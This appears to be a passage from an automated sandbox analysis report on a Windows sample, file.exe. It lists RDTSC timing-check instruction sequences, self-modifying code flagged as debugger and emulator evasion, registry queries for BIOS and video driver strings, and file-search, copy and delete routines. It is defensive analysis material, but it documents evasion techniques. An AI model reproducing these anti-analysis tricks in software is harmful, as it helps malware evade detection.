              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D95D2 second address: 7D95DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9482 second address: 7D9497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB5B0 second address: 7DB5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F38751214A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB5BA second address: 7DB5BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB5BE second address: 7DB5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB5C8 second address: 7DB5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3874C2D1E9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB5E5 second address: 7DB604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F38751214ABh 0x0000000f jmp 00007F38751214AAh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD23F second address: 7DD245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD245 second address: 7DD249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6378 second address: 7E6380 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4C88 second address: 7E4CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F38751214A6h 0x0000000a popad 0x0000000b jmp 00007F38751214ACh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E506C second address: 7E5072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E51DC second address: 7E51E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E51E5 second address: 7E5207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007F3874C2D1D6h 0x00000009 jmp 00007F3874C2D1E4h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5207 second address: 7E5219 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E53DF second address: 7E53E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5668 second address: 7E5673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9921 second address: 7E9927 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9927 second address: 7E992D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9A89 second address: 7E9A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3874C2D1D6h 0x0000000a popad 0x0000000b jl 00007F3874C2D1D8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9A9C second address: 7E9AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F38751214B2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9AB4 second address: 7E9AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9AB8 second address: 7E9AE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F38751214B2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9AE5 second address: 7E9AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804EF4 second address: 804F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F38751214A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F38751214AEh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806F51 second address: 806F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806F55 second address: 806F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806A93 second address: 806A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C1F second address: 806C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F38751214A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C2C second address: 806C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3874C2D1DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C3E second address: 806C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C42 second address: 806C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C46 second address: 806C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C53 second address: 806C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C57 second address: 806C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C62 second address: 806C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3874C2D1D6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F3874C2D1D6h 0x00000013 jmp 00007F3874C2D1E6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B305 second address: 81B33B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214AEh 0x00000007 jmp 00007F38751214AAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F38751214B7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B33B second address: 81B340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B340 second address: 81B346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B346 second address: 81B34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B48F second address: 81B495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B609 second address: 81B630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3874C2D1D6h 0x0000000a popad 0x0000000b jmp 00007F3874C2D1E8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B630 second address: 81B636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81BBF4 second address: 81BC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81C1C2 second address: 81C1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 820902 second address: 82092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3874C2D1E6h 0x00000009 push ecx 0x0000000a jmp 00007F3874C2D1DAh 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82092D second address: 82094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F38751214B8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82094B second address: 82096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3874C2D1E8h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 824E74 second address: 824E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02DD second address: 4DA02E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA02E3 second address: 4DA0336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F38751214ADh 0x00000013 sub ecx, 622C9FE6h 0x00000019 jmp 00007F38751214B1h 0x0000001e popfd 0x0000001f jmp 00007F38751214B0h 0x00000024 popad 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0336 second address: 4DA0348 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3874C2D1DEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0348 second address: 4DA0393 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, 32DAh 0x00000011 pushfd 0x00000012 jmp 00007F38751214ABh 0x00000017 sbb ecx, 1306607Eh 0x0000001d jmp 00007F38751214B9h 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0393 second address: 4DA0399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0401 second address: 4DA042E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F38751214B3h 0x0000000a jmp 00007F38751214B3h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA042E second address: 4DA0490 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 call 00007F3874C2D1DBh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov dx, 2AE6h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 jmp 00007F3874C2D1E3h 0x0000001c jmp 00007F3874C2D1E8h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 jmp 00007F3874C2D1E0h 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0490 second address: 4DA0494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0494 second address: 4DA0498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0498 second address: 4DA049E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 741E90 second address: 741E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 58D0DE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 75CCAB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 58F9FF instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7B96E3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27159
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003518A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00353910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00353910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0035E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00351269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00351269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00351250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00351250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00354B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00354B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00354B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00354B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003523A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00352390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00352390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0034DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0034DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0035CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0035DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0035D530
